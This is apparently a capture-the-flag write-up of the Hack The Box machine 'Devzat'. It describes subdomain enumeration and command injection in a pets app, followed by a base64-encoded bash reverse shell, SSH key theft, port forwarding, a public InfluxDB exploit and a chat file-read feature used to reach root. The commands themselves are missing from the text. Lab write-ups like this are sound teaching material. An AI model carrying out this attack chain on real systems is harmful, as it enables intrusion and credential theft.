🔎🦶Enumeration/Foothold
Devzat is a Medium box from HTB created by cisco. You start by finding a sub-domain, which is susceptible to command injection and reviewing a .git
folder with git-dumper
highlights this. You use the command injection to get a foothold on the box as the Patrick user. On the box you find the devzat chat from earlier has chats specifically tied to the Patrick user mentioning InfluxDB
. After pivoting and exploiting the InfluxDB
you are able to find the password for the final user, Catherine. As Catherine you enter the chat once again to find a chats specific to her mentioning a backup of the chat and a ‘cool feature’. You find the backup to see the cool feature allows the reading of files with the /file
command while in chat which you can use to read the root flag.
Before I begin each machine I kick off a full port scan with RustScan
and pipe the open ports found into NMAP
:
Once it completes I take the scan and convert it to HTML
. I do this as force of habit from client engagements:
Reviewing the results I head over to Port 80
which states http://devzat.htb/. I add it to my host file:
Viewing the site I see Devzat which appears to be a messenger client you access via port forwarding on SSH
. I short Google later I find a GitHub repo Quackduck – Devzat for the app. I login and review the app as well as the source code but see nothing useful.
devzat.htb showing an SSH messaging app.
I decide to kick off some directory/sub-domain enumeration to see if there is any additional folders or sites. I use the same ffuf
command from the previous box Shibboleth and find a new sub-domain:
I add pets to my host file and navigate to the link. I try adding a pet which works. When I delete the pet I get the error ‘Not implemented yet.’. Running this through Burp
Suite I was able to test and exploit command injection and got escalation but here is the easier approach:
Kick off a directory scan with FeroxBuster
:
Results show a .git
directory which means you can use Arthaud – Git-Dumper:
Reviewing the extracted Git you can confirm inside main.go that species is executing commands without proper code sanitization:
By adding a ; and putting a second command I am able to use command injection to execute malicious code. I opened Burp
and intercepted the request. I tried using wget
to pull a non-existent file:
After getting a response I then tried using a bash
one-liner to get a reverse shell on the box. I kept running into issues so I base64
encoded it:
After receiving the response I was successfully on the box as the patrick user. I went to his home directory and grabbed his SSH
key:
I copied it to my machine and logged in as Patrick:
Navigating around as Patrick I can see the user flag sits in the Catherine user directory so she will be who I aim for next. I grab the latest copy of LinPEAS to my box and copy it to the victim:
🔪 Attacker Machine
🎯 Victim Machine
Well LinPEAS was running I logged into an additional SSH
session and logged back into the chat, this time as the Patrick user:
The chat mentions an Influxdb but I hadn’t run into it thus far. Reviewing the LinPEAS I can see another service running within a docker on the box:
I use SSH
to forward each port to my box. Port 8086
gives an HTML
page with 404 – Page Not Found so I use NMAP
to fingerprint the service:
🔪 Attacker Machine
I Googled ‘InfluxDB http admin 1.7.5’ and it came back with a GitHub exploit result – LorenzoTullini – InfluxDB-Exploit-CVE-2019-20933. I grabbed the exploit and ran it:
🔝Escalation to Root
Finally we use Catherine’s password to escalate and grab the user flag. As I did earlier with Patrick, I log into the chat service as Catherine to see if there is another hint. I see a conversation between her and Patrick:
They mention a ‘cool feature’, ‘password’, ‘backup’ and Port 8443
. I begin looking for the backup and run LinPEAS again with extended flags in the background. I find two files in /var/backups
which LinPEAS also highlights:
I copy them both into a temporary directory and unzip them. Doing ls -la
on both directories shows a 4 file difference. I run a diff
command against both directories and see something interesting:
I log into the chat on Port 8443
which has the special function. I run the command /file
from the script above and get the root flag.
As this isn’t an ‘official’ root as I did not login as the root user I began running hashcat against the root users hash 😢.